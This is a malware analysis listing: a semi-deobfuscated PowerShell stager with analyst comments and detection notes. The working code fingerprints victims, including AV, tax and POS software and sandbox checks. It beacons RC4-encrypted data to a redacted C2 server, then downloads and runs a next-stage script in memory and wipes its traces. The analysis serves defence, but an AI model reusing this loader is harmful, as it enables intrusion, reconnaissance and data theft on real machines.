# Semi-deobfuscated PowerShell from malware analysis | |
function sdnfjshdklfhlj { | |
# Runtime configuration hashtable. Every value is assembled with a -f format
# string so that plain-text indicators never appear in the script body.
# Decoded values (from the format-string arguments on the lines below):
#   srv     -> "http://YYY.YY.YYY.YYY"  (C2 base URL; redacted by the analyst)
#   skkey   -> static RC4 key used by Encrypt/Decrypt
#   usag    -> Windows Chrome/Opera-style User-Agent string
#   conType -> "application/xml"
#   reffer  -> "https://www.update.microsoft.com/docs.aspx" (benign-looking Referer)
#   encutf  -> UTF-8 encoder used for all string<->byte conversions
#   pref    -> "gata="  (POST body parameter name prefix)
#   ver     -> "p.1.0.9" (client version reported to the server)
# Later code adds 'seid', 'skey' and 'scr' to this table at runtime.
$ag = @{ | |
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY'); | |
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH'; | |
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck')); | |
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat') | |
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp'); | |
encutf = [System.Text.Encoding]::UTF8; | |
pref = ("{0}{1}"-f'g','ata='); | |
ver = ("{1}{2}{0}" -f '0.9','p.','1.') | |
} | |
# Loads "System.Security" and "System.Core"; results are discarded.
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{1}{2}" -f 'System','.Sec','urity')); | |
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{2}{1}" -f'Sy','.Core','stem')); | |
# "SilentlyContinue": suppresses all non-terminating errors for the rest of the run,
# so failed WMI/registry/network calls leave no visible trace.
$ErrorActionPreference = ("{3}{1}{2}{0}"-f'nue','ent','lyConti','Sil'); | |
# Returns $true when the current token is a member of the local Administrators
# role. Used below to populate the "p=" (privilege) field sent to the server.
function Test-Administrator | |
{ | |
$user = [Security.Principal.WindowsIdentity]::GetCurrent(); | |
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) | |
} | |
# Enumerates installed software from the Uninstall registry hives (native and
# "\Wow6432Node") on each computer and emits every DisplayName matching
# $NameRegex followed by ';'. The default regex targets browsers, tax/accounting,
# point-of-sale and security products (see comment on the parameter).
# Not called in the visible code; presumably invoked by the downloaded stage.
# Detection note: remote HKLM reads of ...\CurrentVersion\Uninstall by powershell.exe.
function Get-Soft { | |
param ( | |
[Parameter(ValueFromPipeline=$true)] | |
[string[]]$ComputerName = $env:COMPUTERNAME, | |
# NameRegex = (Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS) | |
# The literal below uses "XRg" as a stand-in for '|' and replaces it at runtime.
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124)) | |
) | |
foreach ($comp in $ComputerName) { | |
# $keys = '', '\Wow6432Node'  (64-bit and 32-bit uninstall hives)
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92) | |
foreach ($key in $keys) { | |
try { | |
# "LocalMachine": HKLM on $comp
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames() | |
} catch { | |
continue | |
} | |
foreach ($app in $apps) { | |
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app") | |
# "DisplayName"
$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN')) | |
$str = '' | |
if ($name -and $name -match $NameRegex) { | |
$str += $name + ';' | |
$str | |
} | |
} | |
} | |
} | |
} | |
# Queries WMI "root\SecurityCenter2" / AntiVirusProduct on the local host and
# returns the registered AV product names joined by ';' (trailing ';' trimmed),
# or "N/A" when nothing is registered or the query fails.
# Detection note: a SecurityCenter2 query from PowerShell is a common
# defence-evasion/reconnaissance indicator.
function Get-AV { | |
try { | |
# Namespace literal uses "MlV" as a stand-in for '\'.
Get-WmiObject -Namespace ((("{3}{0}{4}{1}{5}{2}"-f 'ootM','Se','yCenter2','r','lV','curit')).REPLace(([Char]77+[Char]108+[Char]86),[STRing][Char]92)) -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'} | |
if ($e){ | |
# Drop the trailing ';'
$e[0..($e.Length-2)]-join'' | |
}else{ | |
"N/A" | |
} | |
} catch { | |
"N/A" | |
} finally { | |
[GC]::Collect() | |
} | |
} | |
# Returns the Win32_Processor Name values of the local host joined by ';'
# (trailing ';' trimmed), or "N/A" on any error.
function Get-CPU { | |
try { | |
# Namespace literal uses "xar" as a stand-in for '\' -> "root\CIMV2".
Get-WmiObject -Namespace ((("{2}{0}{1}" -f'rCI','MV2','rootxa')).rEPLacE('xar',[STrING][cHAr]92)) -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'} | |
$e[0..($e.Length-2)]-join'' | |
} | |
catch {"N/A"} | |
finally{[GC]::Collect()} | |
} | |
# Builds a stable per-victim identifier: lowercase hex MD5 of
# lower(UserName + MachineName + BIOS SerialNumber).
# Sent to the server (encrypted) as the "seid" value in the Cookie header.
function SysMachineID { | |
$HashName = "MD5" | |
[string]$ret = "" | |
$hd = gwmi win32_bios | |
# "SerialNumber"
$ret = $hd[("{2}{1}{0}"-f 'umber','rialN','Se')].ToString() | |
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower(); | |
$StringBuilder = New-Object System.Text.StringBuilder | |
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ | |
[Void]$StringBuilder.Append($_.ToString("x2")) | |
} | |
$StringBuilder.ToString().ToLower() | |
} | |
# Serialises the VALUES of hashtable $ht as a ';'-separated string (keys are
# dropped). Used to flatten each network-adapter record in SysMachineinfo.
# Note: hashtable enumeration order is not guaranteed, so field order in the
# output may vary between runs.
function HasGet-Bretring($ht) { | |
$first = $true | |
foreach($pair in $ht.GetEnumerator()) { | |
if ($first) { | |
$first = $false | |
} else { | |
$output += ';' | |
} | |
$output+="{0}" -f $($pair.Value) | |
} | |
$output | |
} | |
# Enumerates connected network adapters (WMI filter "NetConnectionStatus=2")
# and emits one object per adapter with Name, IP (IPAddress array from the
# related Win32_NetworkAdapterConfiguration), MAC and DeviceID.
function Get-workconfig { | |
Get-WmiObject Win32_NetworkAdapter -Filter ("{5}{3}{4}{0}{6}{2}{1}" -f 'nSt','2','tus=','Connec','tio','Net','a') | | |
ForEach-Object { | |
$result = 1 | Select-Object Name, IP, MAC, ID | |
$result.Name = $_.Name | |
$result.MAC = $_.MacAddress | |
$result.ID = $_.DeviceID | |
# "Win32_NetworkAdapterConfiguration"
$config = $_.GetRelated(("{5}{6}{3}{7}{0}{2}{1}{4}"-f'a','C','pter','et','onfiguration','Wi','n32_N','workAd')) | |
$result.IP = $config | Select-Object -expand IPAddress | |
$result | |
} | |
} | |
# Collects a host-fingerprint record and returns it as "inf=<field>|inf=<field>|..."
# Fields, in order: user domain, user name, machine name, adapter records,
# OS caption, admin flag, screen resolution, current process name and PID,
# PowerShell major version, OS architecture, time zone, uptime, CPU, client
# version, RAM in GB, AV products, virtual-machine flag.
# Sent (RC4+Base64) as the second beacon when the first reply ends in '0'.
function SysMachineinfo { | |
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; | |
$string = "" | |
foreach($c in Get-workconfig) { | |
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID | |
# Dead assignment: $p is never defined here and the next line overwrites $ip anyway.
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6]; | |
[string]$ip = $c.IP[0]; | |
if(!$ip -or $ip.trim() -eq '') { | |
# "0.0.0.0" placeholder for adapters without an address
$ip=("{2}{0}{1}" -f '0','.0','0.0.') | |
}; | |
$lanconf = @{ | |
id = $ID | |
ip = $ip; | |
mac = $macadr; | |
name = $lanname; | |
} | |
$string += HasGet-Bretring $lanconf | |
} | |
$str += "|$string"; | |
$str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption | |
# Running as "system" is reported as "|True" without calling Test-Administrator.
if(([Environment]::UserName).ToLower() -eq ("{0}{1}"-f'syste','m')) { | |
$str += (('3GyTrue') -replACe'3Gy',[ChAR]124) | |
} else { | |
$str += '|'+ $(Test-Administrator) | |
} | |
# Loads "System.Windows.Forms" to read screen bounds; only the last screen's
# width/height survive the loop.
[void] [Reflection.Assembly]::LoadWithPartialName(("{2}{4}{3}{5}{1}{0}" -f'ws.Forms','ndo','S','m.W','yste','i')) | |
$Screens = [system.windows.forms.screen]::AllScreens | |
foreach ($Screen in $Screens) { | |
$Width = $Screen.Bounds.Width | |
$Height = $Screen.Bounds.Height | |
} | |
$str += '|' + "$Width`x$Height" | |
$n = [System.Diagnostics.Process]::GetCurrentProcess() | |
$str += '|'+ $n.ProcessName+'|'+$n.Id | |
$str += '|' + $PSVersionTable.PSVersion.Major | |
$str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture | |
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption | |
$str += '|' + $(Get-SystemUptime) | |
$str += '|' + $(Get-CPU) | |
$str += '|' + $ag['ver'] | |
$str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString() | |
$str += '|' + $(Get-AV) | |
$str += '|' + $(IsVirtual) | |
# Re-encode every '|'-separated field as "inf=<field>|", then drop the final '|'.
$str.split('|') |% {$e += "inf=$_|"} | |
$e[0..($e.Length-2)]-join'' | |
} | |
# Returns time since last boot (from Win32_OperatingSystem.LastBootUpTime)
# formatted as "<d>d:<h>h:<m>m:<s>s".
function Get-SystemUptime { | |
$lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime) ") | |
$uptime = (Get-Date) - $lastboot | |
return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s") | |
} | |
# Sandbox/VM check. Inspects BIOS serial number and version and the computer
# system manufacturer/model for VMware, Hyper-V ("VIRTUAL" / Microsoft),
# Virtual PC ("A M I"), Xen and generic "*Virtual*" markers.
# Returns only the boolean; the VirtualType strings and the $results object
# built here are never used by the visible code. $computer is not defined in
# this scope, so ComputerName is always $null.
Function IsVirtual | |
{ | |
$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber | |
$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer | |
$ResultProps = @{ | |
ComputerName = $computer | |
BIOSVersion = $wmibios.Version | |
SerialNumber = $wmibios.serialnumber | |
Manufacturer = $wmisystem.manufacturer | |
Model = $wmisystem.model | |
IsVirtual = $false | |
VirtualType = $null | |
} | |
# "*VMware*"
if ($wmibios.SerialNumber -like ("{1}{0}"-f 'VMware*','*')) { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{0}{2}{3}{4}{1}"-f'Virt','Ware','ual ','- V','M') | |
} | |
else { | |
switch -wildcard ($wmibios.Version) { | |
# "VIRTUAL" -> Hyper-V
("{1}{0}" -f 'TUAL','VIR') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f ' - Hy','Vi','per-V','rtua','l') | |
} | |
# "A M I" -> Virtual PC
("{0}{1}"-f 'A',' M I') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{2}{6}{5}{3}{0}{4}"-f'ual ','Virt','ua','rt','PC',' - Vi','l') | |
} | |
# "*Xen*"
("{1}{0}"-f'*','*Xen') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{2}{0}"-f'al - Xen','Vi','tu','r') | |
} | |
} | |
} | |
if (-not $ResultProps.IsVirtual) { | |
# "*Microsoft*" manufacturer -> Hyper-V
if ($wmisystem.manufacturer -like ("{2}{1}{0}"-f't*','osof','*Micr')) | |
{ | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{0}{2}{3}" -f ' - Hy','Virtual','p','er-V') | |
} | |
# "*VMWare*" manufacturer
elseif ($wmisystem.manufacturer -like ("{1}{0}{2}" -f 'ar','*VMW','e*')) | |
{ | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{3}{2}{0}{1}" -f 'l - VMW','are','rtua','Vi') | |
} | |
# "*Virtual*" model
elseif ($wmisystem.model -like ("{2}{1}{0}"-f'ual*','irt','*V')) { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f 'ch','Unknown Virtu','ine','al ','Ma') | |
} | |
} | |
$results += New-Object PsObject -Property $ResultProps | |
return $ResultProps.IsVirtual | |
} | |
# C2 transport. POSTs $args[0] (UTF-8 encoded) to a randomised path under
# $ag['srv'] and returns the response body as a string; on any exception the
# exception message is returned instead (callers do not distinguish the two).
# Network indicators: TLS certificate validation disabled; 10-minute timeout;
# Content-Type "application/xml"; spoofed Referer; session id in the Cookie
# header; system proxy with default credentials; 3 random lowercase path
# segments (7-36 chars each) ending in .php/.jsp/.asp.
function vzuhdata{ | |
# encutf | |
$buffer = $ag[("{1}{0}" -f'cutf','en')].GetBytes($args[0]) | |
try { | |
# Accept any server certificate.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; | |
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0; | |
# http://YYY.YY.YYY.YYY/ltjzhcbutq/ozxvgzfxkvm/vcubhhhqmtefvdjywrrylhqmxh.php | |
# $u: "sal er Get-Random" aliases 'er' to Get-Random, then builds one random
# lowercase segment; invoked three times plus a random extension.
$urr = $($ag['srv'] + '/' + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 7 -Maximum 37)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}/{1}/{2}.{3}' -f $(. $u), $(. $u), $(. $u), $(@('php','jsp','asp')| Get-Random))) | |
[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($urr) | |
$webRequest.Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); | |
$webRequest.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; | |
$webRequest.Timeout = 600000; | |
# "POST"
$webRequest.Method = ("{0}{1}"-f 'POS','T') | |
# "usag"
$webRequest.UserAgent = $ag[("{1}{0}"-f 'ag','us')] | |
# "Cookie" header carries $ag['seid'] (the encrypted machine id, see below)
$webRequest.Headers.Add(("{1}{0}"-f 'okie','Co'), $ag[("{1}{0}" -f 'id','se')]) | |
# "conType"
$webRequest.ContentType = $ag[("{1}{2}{0}" -f'pe','co','nTy')] | |
# "reffer"
$webRequest.Referer = $ag[("{1}{0}" -f'effer','r')] | |
$webRequest.ContentLength = $buffer.Length | |
$requestStream = $webRequest.GetRequestStream() | |
$requestStream.Write($buffer, 0, $buffer.Length) | |
$requestStream.Flush() | |
$requestStream.Close() | |
[System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
$streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
$result = $streamReader.ReadToEnd() | |
$webResponse.Close() | |
$result | |
} catch { | |
$_.Exception.Message | |
} | |
} | |
# Fetches the victim's public IP by downloading
# "https://ipinfo.info/html/ip_checker.php" with an IE6/XP User-Agent
# ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)")
# and returning every dotted-quad found in the page.
# Not called by the visible code; presumably used by the downloaded stage.
# Detection note: the legacy IE6 UA on a modern host is itself anomalous.
function getexteip { | |
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; | |
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0; | |
$Wc=New-ObJeCt SYsTEM.NET.WeBCliENt; | |
$u=("{3}{17}{6}{12}{7}{8}{5}{15}{11}{18}{14}{0}{4}{13}{16}{19}{1}{9}{2}{10}" -f ' ','nfoPa','1','Mozill','S','0; Wind','/4.0 (',' M','SIE 6.','th.',')',' ','compatible;','V1;',' 5.1;','ows',' ','a','NT','I'); | |
# "User-Agent"
$Wc.HeADeRS.AdD(("{0}{2}{1}" -f 'Use','nt','r-Age'),$u); | |
$Wc.Proxy=[SYSTem.NEt.WEBREQUeSt]::DefAulTWebPRoXY; | |
$WC.PRoXy.CReDEntIALs=[SYsTEM.NET.CReDentIAlCAcHe]::DefaUlTNetwoRKCREdENTIalS; | |
$rr = $Wc.DoWnloaDSTRIng(("{2}{1}{5}{0}{6}{3}{4}"-f'info/h','ttp','h','chec','ker.php','s://ipinfo.','tml/ip_')); | |
$regex = [regex]'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; $($regex.Matches($rr)).value | |
} | |
# Textbook RC4: key-scheduling over a 256-byte state, then keystream XOR over a
# copy of $data. Symmetric, so the same function encrypts and decrypts.
# Key is cycled ($key[$i % $key.Length]) when shorter than 256 bytes.
function rc4 { | |
param([Byte[]]$data,[Byte[]]$key) | |
[Byte[]]$buffer = New-Object Byte[] $data.Length;$data.CopyTo($buffer, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256; | |
# KSA: identity permutation and key expansion
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $key[$i % $key.Length];} | |
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0; | |
# PRGA: XOR each byte with the next keystream byte
for ($x = 0; $x -lt $buffer.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$buffer[$x] = $buffer[$x] -bxor $s[$t];} | |
return $buffer | |
} | |
# Base64( RC4( UTF8($data), UTF8($ag['skkey']) ) ). Static hard-coded key, so
# captured traffic can be decoded offline with the key from the config table.
function Encrypt { | |
param([string]$data) | |
[Convert]::ToBase64String($(rc4 $ag[("{1}{0}" -f 'f','encut')].GetBytes($data) $ag[("{1}{0}" -f'cutf','en')].GetBytes($ag[("{1}{0}"-f 'kkey','s')]))) | |
} | |
# Inverse of Encrypt: UTF8( RC4( Base64Decode($data), UTF8($ag['skkey']) ) ).
function Decrypt { | |
param([string]$data) | |
$ag[("{1}{2}{0}"-f'f','e','ncut')].GetString($(rc4 $([System.Convert]::FromBase64String($data)) $ag[("{0}{1}"-f 'enc','utf')].GetBytes($ag[("{0}{1}"-f 'skk','ey')]))) | |
} | |
# Splits a decrypted server reply into the next-stage script and a session key:
#   $ag['skey'] = the 32 characters preceding the final character
#   $ag['scr']  = everything before those 32 characters
# The final character itself (the status flag tested as $k below) is dropped.
function get-construct { | |
param([string]$out) | |
# "skey"
$ag.add(("{0}{1}"-f'ske','y'), $($out[($out.length-33)..($out.length-2)]-join '')) | |
$ag.add('scr', $($out[0..($out.length-34)]-join '')) | |
} | |
# seid, routed | |
# Session id sent in the Cookie header: "routed:" + Encrypt(MD5 machine id).
$ag.add(("{0}{1}"-f'sei','d'), ("{1}{0}{2}"-f 'out','r','ed:') + $(Encrypt $(SysMachineID))); | |
if (Test-Administrator) { | |
$eb='p=1' | |
} else { | |
$eb='p=0' | |
} | |
# First beacon. Plaintext body before encryption:
#   "act=pall|p=<0|1>|ver=p.1.0.9|pcn=<PS major version>"
# posted as "gata=<Base64 RC4>"; the reply is decrypted with the same key.
$de = Decrypt $(vzuhdata $($($ag[("{0}{1}"-f'p','ref')] + $(Encrypt $(((("{1}{0}{2}"-f'a','act=p','ll{0}')) -F [CHAr]124)+ $eb + ((("{2}{1}{0}" -f'r=','e','HDYv')).REpLACe('HDY','|'))+ $ag['ver'] + ((("{1}{0}"-f'aopcn=','O')).rePLACe('Oao',[strInG][cHar]124)) + $PSVersionTable.PSVersion.Major))))) | |
# Last character of the reply is a status flag.
$k=$de[$de.length-1] -join '' | |
if ($k -eq 0) { | |
# Flag 0: server wants the full fingerprint; second beacon body is
# "act=fall|" + SysMachineinfo output, and its reply carries the payload.
get-construct $(Decrypt $(vzuhdata $($ag[("{0}{1}" -f'pr','ef')] + $(Encrypt $(((("{0}{1}{2}"-f'act','=fallK','ik')) -RePLaCE ([CHAR]75+[CHAR]105+[CHAR]107),[CHAR]124)+ $(SysMachineinfo)))))) | |
} else { | |
get-construct $de | |
} | |
# Executes the downloaded script in memory. $env:ComSpec is normally
# "C:\Windows\system32\cmd.exe"; characters 4, 26 and 25 spell "iex", so
# this is Invoke-Expression without the literal cmdlet name appearing.
# Detection note: indexing into $env:ComSpec followed by dot-sourcing is a
# known obfuscation pattern for Invoke-Expression.
. ($eNV:coMsPec[4,26,25]-JoIN'') $ag['scr']; | |
# Anti-forensics: clear the script text, key material and error log from
# memory before handing control to the next stage.
$de=$null; | |
$ag.Remove('scr'); | |
# "pref"
$ag.Remove(("{0}{1}" -f 'p','ref')); | |
# "skkey"
$ag.Remove(("{1}{0}" -f 'key','sk')); | |
$ag.Remove('ver'); | |
# "encutf"
$ag.Remove(("{0}{1}" -f 'encut','f')) | |
$Error.Clear() | |
[GC]::Collect() | |
[GC]::WaitForPendingFinalizers() | |
# Not defined on this page; presumably provided by the script executed above.
# Receives the remaining config (srv, usag, conType, reffer, seid, skey).
Get-federerfegegfeg $ag | |
} | |
# Entry point: runs the whole stager defined above.
sdnfjshdklfhlj |